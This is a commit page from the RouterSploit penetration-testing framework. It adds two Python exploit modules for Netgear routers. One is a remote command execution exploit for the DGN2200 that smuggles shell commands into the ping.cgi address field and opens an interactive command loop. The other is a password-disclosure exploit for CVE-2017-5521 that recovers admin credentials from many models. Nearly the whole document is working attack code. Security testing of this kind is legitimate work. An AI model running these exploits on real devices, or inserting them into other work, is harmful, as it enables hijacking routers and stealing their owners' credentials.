Skip to content

R
routersploit
Commit 8c6cb8c7 by Joshua Abraham
Options

Added NETGEAR DGN2200 RCE module

parent f897102f
Showing with 208 additions and 0 deletions
routersploit/modules/exploits/netgear/dgn2200_ping_cgi_rce.py 0 → 100644
import requests
from routersploit import (
exploits,
print_error,
print_success,
print_status,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploits Netgear DGN2200 RCE vulnerability in ping.cgi
"""
__info__ = {
'name': 'Netgear DGN2200 RCE',
'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script',
'authors': [
'SivertPL', # vulnerability discovery
'Josh Abraham', # routesploit module
],
'references': [
'https://www.exploit-db.com/exploits/41394/',
],
'devices': [
'Netgear DGN2200v1',
'Netgear DGN2200v2',
'Netgear DGN2200v3',
'Netgear DGN2200v4',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
login = exploits.Option('admin', 'Username')
password = exploits.Option('password', 'Password')
def run(self):
"""
Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target.
"""
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while True:
command = raw_input("cmd > ")
if command in ['exit', 'quit']:
return
r = self.execute(command)
for l in r:
print l.encode('utf-8')
def execute(self, command):
r = requests.post(self.target + "/ping.cgi",
data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command},
auth=(self.login, self.password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
result = self.parse_output(r.text)
return result
def parse_output(self, text):
yet = False
result = []
for line in text.splitlines():
if line.startswith("<textarea"):
yet = True
continue
if yet:
if line.startswith("</textarea>"):
break
result.append(line)
return result
@mute
def check(self):
"""
Method that verifies if the target is vulnerable. It should not write anything on stdout and stderr.
"""
r = self.execute("echo test123")
return any("test123" in s for s in r)
routersploit/modules/exploits/netgear/multi_password_disclose.py 0 → 100644
from routersploit import (
exploits,
print_success,
print_error,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for multiple NETGEAR routers password disclosure vulnerability.
If the target is vulnerable, it allows read credentials for administration user.
"""
__info__ = {
'name': 'Netgear Multiple Vulnerabilities',
'description': 'Remote and Local Password Disclosure.',
'authors': [
'Simon Kenin of Trustwave SpiderLabs', # vulnerability discovery
'0BuRner', # routersploit module
],
'references': [
'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911',
'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/',
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521',
'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521',
'http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability'
],
'devices': [
'R8500',
'R8300',
'R7000',
'R6400',
'R7300DST',
'R7100LG',
'R6300v2',
'WNDR3400v3',
'WNR3500Lv2',
'R6250',
'R6700',
'R6900',
'R8000',
'R7900',
'WNDR4500v2',
'R6200v2',
'WNDR3400v2',
'D6220',
'D6400',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check():
print_success("Target is vulnerable")
url = "{}:{}".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None:
model = response.headers.get('WWW-Authenticate')[13:-1]
print_status("Detected Netgear model: {}".format(model))
token = self.extract_token(response.text)
if token is False:
token = "routersploit"
else:
print_status("Token found: {}".format(token))
url = "{}:{}/passwordrecovered.cgi?id={}".format(self.target, self.port, token)
response = http_request(method="POST", url=url)
if response.text.find('left\">') != -1:
username, password = self.extract_password(response.text)
print_success('Exploit success! login: {}, password: {}'.format(username, password))
else:
print_error("Exploit failed. Could not extract credentials.")
else:
print_error("Exploit failed. Could not extract credentials.")
else:
print_error("Target is not vulnerable")
@staticmethod
def scrape(text, start_trig, end_trig):
if text.find(start_trig) != -1:
return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
else:
return False
@staticmethod
def extract_token(html):
return Exploit.scrape(html, 'unauth.cgi?id=', '\"')
@staticmethod
def extract_password(html):
username = (repr(Exploit.scrape(html, 'Router Admin Username</td>', '</td>')))
username = Exploit.scrape(username, '>', '\'')
password = (repr(Exploit.scrape(html, 'Router Admin Password</td>', '</td>')))
password = Exploit.scrape(password, '>', '\'')
if username is False:
username = (Exploit.scrape(html[html.find('left\">'):-1], 'left\">', '</td>'))
password = (Exploit.scrape(html[html.rfind('left\">'):-1], 'left\">', '</td>'))
password = password.replace("&#35;", "#").replace("&#38;", "&")
return username, password
@mute
def check(self):
url = "{}:{}".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is not None:
header = response.headers.get('WWW-Authenticate')
if header is not None and 'NETGEAR' in header.upper():
return True # target is vulnerable
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment